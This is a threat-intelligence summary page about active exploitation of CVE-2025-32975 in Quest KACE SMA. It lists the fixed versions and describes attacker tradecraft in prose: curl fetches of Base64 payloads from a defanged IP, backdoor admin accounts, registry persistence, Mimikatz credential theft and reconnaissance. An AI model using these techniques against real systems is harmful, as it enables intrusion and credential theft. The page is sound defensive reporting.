Authentication Bypass in Quest KACE SMA Exploited in the Wild to Achieve Full System Compromise
Summary
Hide ▲
Show ▼
Threat actors are actively exploiting CVE-2025-32975, a maximum-severity authentication bypass vulnerability in Quest KACE Systems Management Appliance (SMA), to gain administrative control over unpatched internet-exposed systems. The flaw enables attackers to impersonate legitimate users without valid credentials, leading to full system takeover. Observed activity began the week of March 9, 2026, and includes lateral movement, credential harvesting, and persistence mechanisms. The vulnerability was patched by Quest in May 2025, but unpatched systems remain at critical risk.
Timeline
-
23.03.2026 08:15 1 articles · 3h ago
Active exploitation of CVE-2025-32975 in Quest KACE SMA leads to full system compromise
Threat actors began exploiting CVE-2025-32975, a CVSS 10.0 authentication bypass flaw in Quest KACE SMA, the week of March 9, 2026. The vulnerability allows full administrative takeover without credentials. Attackers are weaponizing the flaw to execute remote commands, drop payloads, create backdoor accounts, and harvest credentials, enabling lateral movement to domain controllers and backup infrastructure.
Show sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
Information Snippets
-
CVE-2025-32975 (CVSS score: 10.0) is an authentication bypass vulnerability in Quest KACE SMA that allows attackers to impersonate legitimate users without valid credentials.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
-
Active exploitation of CVE-2025-32975 was observed starting the week of March 9, 2026, targeting unpatched, internet-exposed Quest KACE SMA systems.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
-
Successful exploitation enables attackers to seize control of administrative accounts and execute remote commands.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
-
Post-exploitation activity includes dropping Base64-encoded payloads from 216.126.225[.]156 using the curl command, creating additional administrative accounts via runkbot.exe, and modifying Windows Registry via PowerShell for persistence.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
-
Additional observed tactics include credential harvesting (Mimikatz), reconnaissance (enumerating users, running 'net time' and 'net group' commands), and obtaining RDP access to backup infrastructure (Veeam, Veritas) and domain controllers.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15
-
Quest KACE SMA versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4) contain the fix for CVE-2025-32975.
First reported: 23.03.2026 08:151 source, 1 articleShow sources
- Hackers Exploit CVE-2025-32975 (CVSS 10.0) to Hijack Unpatched Quest KACE SMA Systems — thehackernews.com — 23.03.2026 08:15